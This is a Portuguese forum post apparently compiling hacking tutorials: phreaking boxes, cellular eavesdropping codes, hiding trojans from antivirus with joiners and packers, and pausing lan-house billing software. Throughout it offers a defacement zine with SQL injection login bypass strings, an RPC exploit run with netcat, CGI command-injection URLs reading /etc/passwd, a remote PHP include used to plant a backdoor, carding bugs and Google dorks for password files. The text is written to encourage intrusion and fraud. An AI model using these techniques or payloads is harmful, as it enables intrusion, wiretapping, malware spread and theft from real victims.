    Com ela, e' possivel controlar simplesmente o sistema telefonico inteiro, desde que ele seja baseado em CT's (Centrais Telefonicas, nos EUA usa-se CO - Central Office) digitais, o que nao e' o caso do Brasil, que utiliza CT's eletro- mecanicas. O phreaking e' uma arte ja' antiga. Para se ter uma ideia, a primeira Blue Box foi encontrada no ano de 1961, no estado de Washington com um estudante. Ha' relatos de que hackers famosos, como Kevin Mitnick, ja' praticavam o phreaking antes de se casarem com os computadores. O samurai (nome normalmente dado `a um hacker que trabalha legalmente para alguma instituicao, na busca de outro hacker) que o pegou, Tsutomo Shimomura, foi praticamente quem fez o primeiro relato mais completo sobre o phreaking de telefones celulares. Alias, Kevin so' foi pego por ele porque usava um celular clonado para acessar ilegalmente uma serie de computadores. O universo do phreaking comecou realmente a crescer em novembro de 1960, quando a Bell, compania telefonica americana, divulgou em seu jornal tecnico, The Bell System Techinical Journal para ser mais preciso, que era largamente distribuido para universidades e polos educacionais, uma tabela que mostrava as frequenciais utilizadas para o controle das linhas. O nome do artigo era "Signaling Systens for Control of Telephone Switching". Como eu ja disse, a primeira Blue Box apareceu no ano seguinte. Em outubro de 1971, a revista Esquire publicou um artigo chamado "Secrets of the Little Blue Box", onde pela primeira vez se teve noticia de phrekers famosos como o Captain Crunch, que tinha este nome em homenagem a um cereal matinal que vinha com um apito de brinde. Este apito produzia um som com a frequencia perfeita de 2600 Hz, que e' a mesma usada nas Blue Boxes. Ficou tambem se conhecendo Joe Egresias, um phreaker cego, que usava um piano de brinquedo para emitir os tons de controle da compania telefonica. Neste mesmo ano, surgiu a primeira publicacao mensal dedicada aos phreakers: YIPL, hoje conhecida como TAP. E' um jornal mensal. Depois disso o universo do phreaking comecou a crescer e a repressao policial bem como os sistemas de deteccao tambem. Ha' alguns anos, comecou a se implantar um sistema conhecido por ESS (Eletronic Switching System), conhe- cido como o pesadelo dos phreakers. Este sistema monitora simplesmente tudo o que acontece nas linhas telefonicas. Todo o numero que voce digita, mesmo se for engano, pra onde voce liga, a que horas, simplesmente tudo. Mas o fim definitivo das Blue Boxes, sera a substituicao do sistema atual, conhecido como in-band, onde todo o controle das linhas telefonicas se da' por sinais frequenciais enviados pelas mesmas linhas por onde sao enviados os sinais de voz. O novo sistema a ser implamtado e' conhecido por CCIS (Commom Chanel Inter-office Signaling System), onde a transmissado das frequencias de controle se da por linhas diferentes das que transmitem as ondas de voz. O sistema ainda nao foi completamente implantado, pelo custo que ultrapassa a casa dos bilhoes de dolares. Ate hoje a Bell e' altamente criticada pela opinao publica americana por nao ter adotado este sistema desde o inicio.

    As CT digitais e o funcionamento da Blue Box.

    Imagine um numero de telefone qualquer:

    (011) 328 - 1234 | | | | | +----- numero da estacao | +------------ codigo da central telefonica +----------------- codigo de area

    O numero 011, representa a area onde esta localizada a CT, 328 e' o numero de identificacao da central e 1234 e' a identificacao da estacao (telefone). Num sistema telefonico baseado em CT's digitais (o que nao e' o nosso caso), a comunicacao entre duas CT's e' feita atraves de linhas vagas conhecidas como trunks. Essas linhas nao sao acessiveis diretamente por telefones, apenas pelas centrais. Quando voce disca um numero de uma CT, ela procura um trunk vago entre ela e a outra CT que voce esta chamando e entao manda algumas frequencias de controle junto com o numero que voce discou. Para identificar quais trunks estao vagos, a CT procura por uma frequencia de 2600 Hz em algum trunk. Todo trunk vago possui um sinal com frequencia de 2600 Hz. Quando alguem vai utilizar uma Blue Box, ele liga para um numero do tipo toll-free (DDG - Discagem Direta Gratuita aqui no Brasil). Logo apos a pessoa atender la do outro lado, ele poe a Blue Box perto do fone e emite um sinal de 2600 Hz. Isto faz com que automaticamente a ligacao seja terminada, pois a CT pensa que o trunk esta novamente vago. Ao termino do envio deste sinal, a CT pensa que uma nova ligacao esta sendo solicitada e envia um beep. Neste momento o dono da Blue Box digita nela o numero que ele quer, ela emite as frequencias e entao a ligacao se completa para onde ele quiser. Mas nao para por ai, pois existem outros codigos que podem ser emitidos pelos quais se pode controlar praticamente tudo que ha no sistema telefonico.

    Outras boxes e suas utilidades

    Existem diversas boxes que fazem um serie de coisas. Como eu ja disse, algumas sao inofensivas e nao passam de dipositivos que trazaem algumas comodidades ao seus usuarios. Existem outras que tem utilidades nao tao agradaveis, como e' o caso das Magenta Boxes. Estas por sinal podem ate' ser utilizadas aqui no Brasil, dentro das caixas de verificacao. Elas fazem com que voce chame um numero e depois a chamada e' automaticamente transferida para a linha de algum outro coitado que pagara' por qualquer ligacao que voce faca. De chamadas locais ate internacionais. Outra que funciona aqui no Brasil e' a Black Box. Ela faz com que as pessoas que liguem para a sua casa nao sejam cobradas pela ligacao. Funciona ate com chamadas interurbanas. Diversos projetos de boxes podem ser encontrados no seguinte endereco:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Nem todas funcionariam aqui, cabe a voce ter o bom senso de perceber isso. Nao me pergunte, nem sempre tenho tempo pra ficar analizando boxes. A responsabilidade pelo uso destas coisinhas tambem e' totalmente sua, eu to cagando e andando se voce for em cana por causa delas.

    O phreaking e a telefonia celular

    O sistema de telefonia celular e' altamente vulneravel ao phreaking. E' simples se fazer escutas telefonicas, e outras coisas como: clonagem de telefones para se efetuar ligacoes gratuitas, etc. Se voce duvida, pegue um celular como o famoso e numeroso PT-550 da motorola. Tire a bateria do celular e note que ha' tres encaixes metalicos atras do aparelho. Coloque um pedaco de papel laminado no encaixe do meio e recoloque a bateria. Lique o telefone (ele esta agora no modo de programacao) e digite:

    # 08 # 11 XXXX #

    Onde:

    #08 Liga o audio de RX (Receptor) #11 Ajusta canal de funcionamento do transreceptor XXXX numero do canal (aconselho a voce tentar numeros abaixo de 800)

    Exemplo:

    #08#11567#

    Tente varias vezes ate encontrar um canal onde haja conversa. Percebeu? Voce esta fazendo uma escuta em um telefone celular. Nao requer pratica nem tao pouco habilidade. Vale lembrar que se algum policial te pegar voce pode ir em cana. Ha tambem maneiras de se fazer clonagem, isto e, fazer o seu telefone celular usar a linha de outra pessoa. Eu particularmente nunca tentei mas, se voce quiser por sua pele a risco, procure pelo Motorola Bible, ou outros tantos textos existentes por ai. Falando de maneira simples, um celular e' um radio-transmissor que trabalha com frequencias na faixa de 800 MHz, e que e' capaz de alternar entre canais ao receber comandos de um computador conhecido como Central Switch, que controla o sistema telefonico movel. Pode-se dizer que um aparelho celular e' dividido em duas partes: O Transceiver (Transmissor/Receptor) e a cabeca de comando. Entende-se por cabeca de comando o teclado e seu circuitos de comandos, a NAM e a ESN. A NAM e' um chip de PROM (Programable Read Only Memory) que contem informacoes sobre o funcionamento do celular, como numero, area, etc. Ja a ESN (Eletronic Serial Number) e' um chip de ROM (Read Only Memory) que armazena um numero geralmente de 11 digitos octais, referentes a um numero de serie unico para cada telefone. Existem alguns modelos de celulares que tem as suas NAM's reprogramaveis pelo proprio teclado do celular. Outros necessitam que se ligue o celular a computadores. Quem quiser saber mais sobre o assunto, pode procurar informacoes em:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Alias, fica aqui um link que nao pode faltar na sua colecao. Simplesmente esse e' uma das melhores paginas hacker que eu conheco.

    O phreaking no Brasil

    E' meio que impossivel conseguir estipular mais ou menos uma data certa para o inicio da cena phreaking no Brasil. Provavelmente ela comecou dentro das escolas de eletronica e entre os chamados hobbistas. Aquelas pessoas que compram revistas de eletronica para montar pequenos projetos em casa. Nesse meio, o famoso diodo que deixa voce fazer ligacoes de telefones publicos sem fichas, ja e' um velho conhecido ha muitos anos. Inclusive a pratica do Black Box aqui no Brasil ja e' antiga pois percebe-se a preocupacao da compania telefonica ao fazer a ligacao cair apos o telefone tocar muito e ninguem atender. A segunda geracao de phreakers provavelmente deve ter nascido nas BBS's. A pratica de ligacoes para CHD's (Call Home Direct), que sao servicos que permitem a utilizacao de cartoes telefonicos para o pagamento de chamadas, ja e' antiga. Pode-se ligar para estes servicos de qualquer lugar do planeta sem pagar nada. Em seguida eles costumam usar programas que usam a SoundBlaster para simular o barulho das Blue Boxes e assim manipular os trunks estrangeiros. Ultimamente, os phreakers nacionais estao mostrando as caras e trocando informacoes. Pude perceber isso apos editar um texto a respeito da telefonia nacional. Como o texto estava meio incompleto por ter sido entregue rapidamente, recebi diversas cobrancas de varias pessoas que realmente parecem ter altos conhecimentos em telefonia e que teem me mandado varias contribuicoes. - Novidades

    Parece que de uns tempos pra ca, muito tem se falado a respeito de pagers e TV a cabo no panorama internacional do universo phreaker. No panorama nacional, os projetos de decodificadores de TV a cabo, ja tem alguns anos. Sobre uma analise mais aprofundada, eu posso afirmar que no Brasil a maioria da cena phreaker e' representado pelo pessoal aficcionado por eletronica. Os hackers costumam mais efetuar blueboxing para servicos estrangeiros. E' facil entender pois, coisas como construir boxes e decodificadores de TV a cabo, requerem as vezes um bom conhecimento de eletronica e de confeccao de placas de circuito impresso.

    Onde encontrar mais informacao:

    Se voce quiser saber mais sobre phreaking, pode procurar nos enderecos que ja foram passados acima informacoes importantes. Sobre o phreking na telefonia nacional,procure o Manual Definitivo de Violacao a Telefones Publicos e Privados nos seguintes enderecos:

    Versao HTML

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Versao ASCII MS-DOS CP 850 Zipada

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ... l_br11.zip Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    FTP

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Comentarios, opinioes, correcoes e complementos para o Manual, mailto:tom.waits@usa.net

    Leituras complementares:

    The Official Phreaker's Manual v1.1

    Phrack Magazine - 46-8 - Artigo sobre pagers

    Phrack Magazine - 39/40 - Artigo sobre telefonia celular

    Lista de servicos TeleXX - onde XX e' a sigla do seu estado.

    Motorola Bible - Guia de referencia completo sobre programacao de celulares e pagers motorola.

    Escondendo o trojan em arquivos confiáveis

    Existem muitos programas na Internet que escondem os servidores em arquivos executáveis. Um deles é o The Joiner, que possibilita você juntar o trojan com algum outro executável e criar um terceiro contendo os dois. Além de possibilitar que o coloque em fotos. Um método engraçado muito utilizado hoje pelos que se dizem ?hackers?, é renomear algum executável para foto e deixar um largo espaço. Por exemplo: supondo que o nosso servidor é o arquivo server.exe. Então iríamos renomeá-lo para loira.jpg .exe.
    Assim muitos usuários inexperientes caem no truque. Todos os métodos citados anteriormente têm somente uma falha: se você criar um executável pelo The Joiner ou renomear o servidor, qualquer programa anti-vírus logo detectará o arquivo. Para que o anti-vírus não o detecte, é só usar a imaginação. Crie um programa em alguma linguagem e coloque o servidor no meio dos arquivos. Faça com que o programa quando executado renomeie o servidor e o execute. Assim, se o servidor estiver como voodoo.dll passe-o para sysconf.exe e execute. Esse método não é infalível mas engana a grande maioria dos programas de detecção. Mas não todos.


    Joiner: esconda o servidor em outro arquivo

    Utilizando compressores de executáveis

    Como vimos no ítem anterior, vários métodos podem ser usados para esconder um cavalo de tróia. Depende mais da imaginação do invasor. Só que ainda assim podem ser facilmente detectados. Esse é o primeiro livro a citar o método do compressor de executáveis windows 32 bits, apesar de essa técnica já vir sendo utilizada em larga escala. Consiste em usar um programa compressor de arquivos EXE, que apenas diminua o seu tamanho retirando espaços vazios desnecessários. Um programa comum é o Petite que diminui cerca de 30% ou mais do arquivo original. Um trojan (ou mesmo um vírus) comprimido é absolutamente indetectável por anti-vírus e scanners. Isso porquê esses programas se baseiam na estrutura do arquivo para identificá-lo. É como se tivesse fotos na memória e as comparasse. Como não encontrou nenhuma igual, não mostra nenhum tipo de aviso. Um operador de sistemas têm que conhecer muito bem seus arquivos e conferir sempre novas alterações (como datas e horas de novos arquivos) para evitar que um trojan comprimido seja instalado em seu sistema. Não dependa só de anti-vírus.


    [color=red]Esconda seus trojans dos Antí-Vírus![/color

    Vamos realizar passo a passo o processo de esconder um trojan de um anti-vírus.

    1.Passaremos o Norton para que encontre o arquivo infectado:
    2- Agora, abriremos o programa PETITE para comprimir o arquivo EXE do servidor do Netbus.
    3-Com o arquivo já comprimido, novamente testamos o anti-vírus

    [color=red]Esse é só para os que freqüentam uma lan,burle seu tempo![/color

    Bom primeiramente vamos pressisar do Process Explorer da Symantec (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ... lorer.html).

    Baixe o programa e instale no computador da Lan House.

    Abra o programa e procure pelos processos do Easy Cafe (facilmente identificado pelo ícone de computador e o segundo processo é um olho roxo, me esqueci o nome agora.)

    Se eu não me engano os dois processos vão estar em roxo também, um abaixo do outro.

    Selecione os dois e clique com o botão direito e vá em PAUSE.

    Pronto. Fique 5 horas pagando somente 15 minutos e quando o administrador chear perto, abra rapidamente o Process Explorer, selecione os dois processos, clique com o botão direito e vá em RESUME =D

    Na minha opinião é muita sacanagem sim =D
    Uma vez eu paguei meia hora e fiquei no PC durante umas 3 horas, depois veio a mulher e ela só pediu para reiniciar o PC..
    Ou ache a senha do administrador =D
    O da lanhouse que frequento é SYSTEM, pwd: NOVAHOME
    Que senha cafona..

    E podemos usar vários outros programas para listar processos (Google pra que te quero: process Viewer) etc..


    E Para Finalizar Com Chave de Ouro!!!!


    #################
    #INTRODUÇÃO (UI)#
    #################


    Muito bem, se você decidiu ler essa zine é porque acha que tem mais a aprender, e isso é bom.
    Tipo, vo começar contando um pokinho da minha história para animar alguns e desanimar outros heheheh. Há mais ou menos 2 anos eu to atuando nessa área de deface, e nesse tempo tive oportunidade de conversar tanto com pessoas de conhecimento elevado quanto com lammers que se achavam o máximo mas naum sabiam $%#&"/ nenhuma. Bom, ha um ano e três meses eu criei esse nick, que agora, após a publicação dessa zine, eu naum uso mais para tais atividades. Não estou mais atuando nessa área e não mecho com invasão mais. Agora estou tentando aprender programação , que por sinal dá muito mais futuro que essas brincadeiras de muleke. =)
    Esta zine foi escrita para iniciantes mesmo, e como podem ver, ela é mtttto básica, quem ler e gostar vem falar comigo no icq (175119018) que se pá eu faço uma mais avançada na medida do possível.
    Bom pessoal, não tenham essa zine como única fonte de conhecimento, procure em outros sites pois o conhecimento é infinito =)
    Tipo, você que está lendo isso, não saia passando para todo mundo, ou melhor, não passe pra ninguem, quanto mais gente souber é pior pra vc mesmo...
    Agora eu sou um cara pacato que não frequenta mais a brasnet e nem ocupa o tempo invadindo os outros, tipo, nem adianta me pedir nada pois eu cancei dessa $%#&"/. =/
    Não vo dizer akilo que vocês sempre veem em "sites hackers" aehuaee:
    Não me responsabilizo bla bla bla, pe pe pe...
    q se ferre, voce que tem que ter responsabilidade, se não tiver, aprenda a limpar o bumbum antes de ler isso | auehaueuae |.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Para entender essa zine você deve ter noção de IP (uehauea falano assim é até engraçado mas esse texto é beeeeeeeem básico), um pouco de DOS e linux e principalmente, ESQUEÇA DE UMA VEZ POR TODAS ESSE NEGOCIO DE INVADIR COMPUTADORES PESSOAIS, estamos falando de servidores http.
    O que é um deface?
    Ato de desfigurar sites da web em diversas plataformas, substituindo a index do site pela que você desejar, normalmente inserindo nela algum protesto e seu nick. Se você não tem um nick, sugiro que crie um, pois seu nick é a sua identidade no mundo defacer.

    Primeiro bug que o titio Javally vai ensinar:
    Bom, como em todas as zines que eu ja vi até hoje, o primeiro bug a ser ensinado é o clássico PDW

    ########
    # PDW #
    ########

    PDW = PASTAS DA WEB
    ALVO = IIS 4.0 on Windows NT4, Windows 2000, Windows XP, Windows 2003 Server
    Nota = Iniciante

    Bom, quando eu aprendi esse bug ele era tido como um bug desprezivel, já que é facílimo de ser explorado e muito antigo. Os caras que se acham "elite" não usam esse bug, mas ele tem catado muito antigamente, pois, ao contrario do que os elite de merda esperavam, o bug está presente nos windows novos e nos IIS (Internet Information Server) 4, 5 e 6.0
    Para explorar esse bug, você precisa de um scanner, eu sugiro o Arplhmd Group Exploit, que pode ser encontrado em Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (lá vc ve como funciona)
    Após achar o site vulneravel, você vai no mirc e digita: /dns ip-do-site, para ver qual é o endereço do site, tipo, Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Daí voce vai em iniciar, executar e joga essa string: %WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

    Pronto, vai abrir uma janela. Nessa janela vc coloca nova pasta da web e coloca o endereço do site que voce pegou com o scanner.
    Vai aparecer uma pastinha com o nome do site, daí vc entra nela e altera a index ou default, à carater do servidor.
    Pronto, agora coloca sua index e sai por aí gritando que você é ráquer...


    #########
    # Proxy # _|_
    #########

    Para explorar algumas falhas, usamos 0 navegador. Porem, seu IP pode ficar logado no sistema...
    Nossa, e agora??? Calma...
    Tipo, para que nosso IP não seja descoberto e a festa não acabe, vamos usar um proxy.
    Nossa, um PROXY!!!! maaaaaaeee, agora eu sei o que um proxy...
    hehehehe O que é um proxy?
    É um computador, um servidor à longa distancia normalmente que permite que você se conecte a ele primeiro e ele se conecta ao site, ou seja, nesse site ficará logado o IP do proxy e não o seu, sacou??
    Vixi, agora eu so o SR. anonimo!!!
    Calma, tb naum é assim, voce tem que procurar um proxy que te deixe totalmente anônimo, pelo contrario voce pode ser pego e seu pai te deixa de castigo um mês (ou fodem vc na cadeia).
    Vc vai em propriedades do navegador (IE), conexões e seleciona Configurações da LAN. Aí vc procura proxy e coloca o ip do proxy que você arranjou.
    Depois você entra na net, tipo, normalmente quando tá mais lento é pq funcionou, mas naum vamos arriscar, entre em algum site que você conhece que mostra seu IP e faça o teste.
    Se aparecer o IP do proxy, é isso ae, mãos a obra.
    Mas javally, como eu procuro proxys???
    Não precisa procurar,eu sei onde tem muiiiiitos

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (isso vale ouro galera)

    vai la...
    pode falar, eu so lind0!!
    Tipo, eu naum uso proxy, mas tipo, você usa se quiser, eu recomendo apenas para invadir sites brasileiros e tal, gringo nem dá nada.

    #################
    # SQL Injection # (basicão)
    #################
    ALVO: IIS 5.0 (Ruindows 2000)
    Nota: Iniciante-medio

    Esse bug é muito legal hehuaehuae
    Voce vai encontrar vários sites bugados, mas não vai conseguir ownar (possuir, usado para designar um deface) todos. Essa falha consiste em injetar comandos no banco de dados SQL obtendo privilegios de administrador.
    Para procurar um site vulneravel usaremos o Google (nossa, o Google??) é, isso mesmo.
    O diretório onde você vai injetar a string é:

    /admin/index.asp
    /admin/default.asp

    tb tem esses:
    /admin
    /adm
    /admin/index.asp
    /admin/default.asp
    /admin/admin.asp
    /admin/login.asp
    /admin/entrar.asp
    /admin/default.asp
    /admin/index.asp
    /admin/login.asp
    /admin/password.asp
    /admin/senha.asp
    /login/login.asp
    /adm/login.asp
    /adm/index.asp
    /adm/default.asp
    /admin/site/entrar.asp
    /ecommerce/admin/index.asp
    /ecommerce/admin/default.asp
    /ecommerce/admin/login.asp

    Existem outros mas nunca funcionou comigo... Tipo, vc vai no Google e procura por sites vulneraveis, assim: allinurl: "/admin/index.asp" ou "/admin/index.asp.
    Quando você achar o site vulnerável, você vai inserir a string. Deverá aparecer um campo para login e senha, daí vc coloca:

    login: 'or'1 ou 'or''='
    senha: 'or'1 ou 'or''='

    ' or ' 1
    ' or '1'='1
    ' or 1=1--
    'or''='
    ' or 'a'='a
    ') or ('a'='a

    Daí se o site estiver vulnerável você vai cair no diretório do admin, aí você procura o caminho da index e owna o site! Tipo, você tb pode faze otras coisas do tipo criar um user pra vc e etc.

    Hey sandro, vc manda melhor???

    #######
    # RPC #
    #######

    Vários cara me pediram para não publicar tutoriais sobre esse bug, mas alguns motivos me levaram a publicar:

    1- No mundo deface esse bug jé é muito conhecido;
    2- Todos tem direito à informação.
    3- Eu so bonzinho =)

    RPC = Remote Procedure Call (Chamada de procedimento remoto)
    ALVO = Windows NT4, Win 2000, Win XP, WIn 2003 Server
    Nota: Good

    Tipo, quem não ler isso com atenção e não buscar mais informações não vai conseguir ownar por esse bug, pq ele exige um pouco mais de atenção.
    O exploit usa a porta 135, então qdo vc ver algum micro com essa porta aberta vc ja fica atento...
    Vc pode usar o mesmo scanner que o de pdw mas com um script diferente para usar esta falha. O legal do RPC é que ele não pega apenas servidores mas tambem personal computers (mas lembre o que eu disse sobre invadir os outros)
    Após achar os IP´s vulneráveis, voce faz o seguinte:
    baixe os exploits para RPC:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Agora baixe o netcat, que será usado para conectar você ao computador explorado:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Copie rápido os exploits, esse site eu invadi a um temp atras e uso ele como se fosse meu ftp auheuaha, copia rapido pq pode sair do ar.

    Vixi, que lindo, agora você já tem tudo em mãos, vamos à prática:

    Você vai entra no prompt do dos, ir até a pasta onde vc colocou os exploits e digitar o nome do exploit.
    Você verá que vão aparecer várias targets, daí vc escolhe a target correspondente ao sistema a ser explorado e manda bala.
    Se aparecer "Use the netcat to conect to server", aí que você vai usar o netcat, da seguinte forma:
    nc ip 4444
    4444 é a porta que o exploit abre pra vc entrar
    Vixi, que legau, o exploit abre uma porta pra mim???
    dãhhhh, no comments =|
    se der certo, vc vai cair em C:/windows/system32
    se der errado, naum acontece nada
    Tipo, vc vai demorar um pouco pra achar computadores vulneraveis mas paciencia, vida de ráquer é dificil...
    EEEEEEEEEEEEEEEEEEEEEEEE, agora eu sei RPC !!!!
    maaaaaaaaaaee, eu so hacker agora, num conta pra ninguem!!!!

    ###############
    # PHP Website #
    ###############

    Ohhhhhhhh, agora vamos aprender PHP Website!!!

    ALVO: Linux (vixi)
    Nota: sUx

    Tipo, essa falha é babaca, mas pra quem quiser aprende vai aí a dica:
    Use o Arplhmd Group Exploit que ele faz tudo pra vc :*
    Após achar o site vulneravel, com o mesmo scanner, voce faz o seguinte:
    coloca lá: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (substitua o site.com pelo site vulnerável)
    Agora vc está no setup do site, faça o que quiser, primero crie um usuario pa vc depois entre como admin e detona tudo
    (PS: nunca usei isso)
    *Meu deus, agora eu sei hackear linux... maaaaaaaaaaaaaaeeee*


    ########
    # dDoS #
    ########

    Bom.. vou falar sobre DDoS (Distributed Denial of Service). Traduzindo ficaria Negação de Serviço Distribuída. Pela tradução você já tem uma idéia do que significa. Mas, mesmo se assim você não entendeu, significa fazer com que uma determinada máquina na rede pare de responder à requisições, ou seja, os usuários legítimos dela não irão utilizar seus serviços, enquanto o ataque DDoS se suceder. Esse foi um ataque bastante utilizado nos sites mais visitados do mundo, como Yahoo, Altavista, Amazon.com, etc. Note que esses sites ficaram indisponíveis durante horas e horas. Aqui no Brasil também houveram e ainda há ataques DDoS. Sites como Cade?, Zipmail, UOL, entre outros foram atacados.
    O ataque DDoS consiste em enviar um grande número de requisições à umadeterminada máquina. Esta vai tentar responder. Até que no começo ela provavelmente irá conseguir responder às requisições. Mas se as requisições forem contínuas, vai ter um momento em que a máquina não terá capacidade para respondê-las e assim vai deixar de responder a qualquer outra máquina que a requisite. O objetivo foi realizado! Ninguém agora consegue visualizar sequer uma html do seu site... nada!
    É como se a máquina estivesse desligada. Vou mostrar graficamente mais ou menos como funciona um ataque:


    ____________ _____
    | Largura | | |
    | de | | _ |
    |banda alta| | |----|
    /|__________| | | |
    / | | |___| |
    ALVO / | |
    ________ / | |
    | | / ____________ _____ | ____________ _____
    | | <-- / | Largura | | | | | | | |
    |Server| ___ /____________| de | | _ | | <VOC> ) |
    |,\__-' \
    \_ \
    ~~-___ )
    \ \
    %%%%%%%

    ###########
    # NetBios #
    ###########

    Aee, decidi falar um pouco sobre isso que não é uma falha nem nada, tipo, não se cata servidores e nem faz-se deface. Eu coloquei isso aqui para que você possa ter uma idéia do que é e explorar esse "descuido" das pessoas. Eu acho pelomenos umas 80 máquinas vulneráveis com isso, server para você ter acesso ao computador remoto e ler as informações mais sigilosas, inserir trojans, enfim, fazer uma diversidade de coisas, isso vai da criatividade de cada um. Muitos podem me criticar por expor isso assim dessa maneira, outros podem me achar babaca, mas eu não to nem fudendo com isso não, tipo, quem achar ruim que faça melhor...
    Seguinte:
    Muitas pessoas utilizam o compartilhamento de rede do Windows, as chamadad redes Microsoft.
    A maioria delas, compartilha o diretorio c: inteirinho e NÃO coloca senha, naum me pergunte porque... o povo é burro memo mas essa é otra historia hehehehe.
    Daí você vai usar um programa milagroso chamado R3X. A maioria dos lammers tem mas não sabem como usar... é foda neh...
    Tipo, no site tem um tutorial de como usar esse programa, como eu naum so papai noel, vc lê o tuto e depois se tiver alguma dúvida me procura que eu esclareço...
    Achando ips vulneraveis ( cara isso é mtttto facil e pega mttttto) você vai no seu navegador e coloca:
    \\ip
    tipo:
    \\192.168.0.1
    daí se não pedir senha, mete bronca, c:/ interinho na sua mão ou a pasta que o pato tiver compartilhado.
    Não há muito o que comentar sobre isso, ae, pros elite que tem fama de hacker na cidade mas só entram por compartilhamento, sinto mto mas vão ter que descobrir otra coisa uheuaheuaheua.
    O R3X vc acha em:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    mete bronca
    =)
    ########
    # CGI #
    ########

    Exploit local root: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    <lammer> Javally, como que eu faço pra ownar por CGI???
    <Javally> cara, eu vo te falar, mas vc naum vai sair espalhando?
    <lammer> Claro que não, pode confiar
    <Javally> blz, to confiando hein...


    Bom pra começar vc precisa de um scaner que vc ja tem, ele scaneia essa vulnerabilidade.

    Então vamos ao q interessa vul de CGI é STRINGS q é um comando q vc taka assim Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... LINUX e é isso CGI...

    /cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls|

    /cgi-bin/eshop.pl?seite=;ls|

    /scripts/calendar/calender.pl?config=|cat%20/etc/passwd|

    /cgi-bin/directory.php?dir=%3Bcat%20/etc/passwd

    /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id

    /cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=|/bin/ls|

    /cgi-bin/mailmanager.pl?setupfile=demo&page=|/bin/ls|

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ... LE=/home/*

    mas a q funciona mais no momento q é a vuln do scaner é a seguinte:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ... ame+-a;id|

    Tipo, pra explorar essas vulnerabilidades você tem que ter um mínimo conhecimento de Linux, tipo, isso vc vai atrás,acha em qualquer site sobre linux e como eu ja disse, não so papai noel...

    ############
    #YABBSE.PHP#
    ############ __________________________
    |Falae, a zine ta ajudando|
    | hein??? |
    ---------------------------


    Tipo, só pra reforçar, o Arplhmd tem varios scripts, ou seja, ele é capaz de scanear em várias falhas, tipo, basta vc baixar o script de scan, por isso eu naum vo entrar em detalhes...

    Após achar o site vulnerável, vc joga a seguinte string:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ... d=COMANDOS DE LINUX

    Em lugar de Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... você deve indicar um site onde tenha um cmd em php, isso va acha na net mas qualquer coisa eu ajudo tb.

    Sacou???
    Nossa Java, mas aí eu tenho acesso ao sistema???
    <Java> daí eu sugiro que você jogue um backdoor em /tmp (pasta onde você tem permissão pra executar arquivos no Linux) , execute o backdoor e entre por telnet ou até mesmo netcat.
    procure o backdoor telnetd já compilado, ae, naum tenho o endereço,mas qualquer coisa me dá um toque que eu discolo.
    Tipo, eu duvido que alguem que tá lendo owne por essa falha, mas tipo, se conseguir eu pago um X-tudo no komilão. =D.

    ####################
    # Bug para Carders #
    ####################


    [] [] [] | [] [] [] [] | [] [] [] [] | [] [] [] []
    ==============Carder - cartmanager================
    [] [] [] | [] [] [] [] | [] [] [] [] | [] [] [] []
    -----------------------------------------------------------------
    Esses tutorias de Carder que irei publicar serão bem simples.
    -----------------------------------------------------------------
    -> Procurando sites bugados

    O modo mais simples certamente é o Google(Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...) mas se
    você sabe bem de alguma linguagem de programação recomendo que faça
    seus próprios scans Wink
    Para achar sites bugados com essa falha v´no Google e digite:
    allinurl: cart.cgi
    ou
    allinurl: cartmanager.cgi
    -----------------------------------------------------------------
    -> Explorando

    Modifique o site :

    Exemplo: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    .Modifique por

    Exemplo: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    -----------------------------------------------------------------
    Ps. Nunca se esquece que os MDBs e os scripts podem variar de diretorio Wink
    Esse txt é para aprendizado não me responsabilizo pelo que você
    vier a fazer.

    #########################
    #Usando Google como scan#
    #########################


    Realmente o google e muito util pois com alguns comandos (strings) voce podera achar coisas incriveis e muito uteis.

    Alguns exemplos abaixo


    allintitle: "index of/root"
    O google e muito util pois podera dar alguns resultados muito satisfatorios com comandos (strings)

    inurl:usuarios.mdb
    inurl:users.mdb
    inurl:site.ini
    inurlassword.mdb
    inurlrders.log

    "Index of /admin"
    "Index of /password"
    "Index of /mail"
    "Index of /" +passwd
    "Index of /" +password.txt
    "Index of /" +.htaccess
    index of ftp +.mdb allinurl:/cgi-bin/ +mailto

    administrators.pwd.index
    authors
    shadow_sjm
    Aprendiz


    Mensagens: 722
    Data de registro: 26 Jul 2006, 02:34 Voltar ao topo
    --------------------------------------------------------------------------------

    Apostila da Galera,uma apostila de todos os membros!
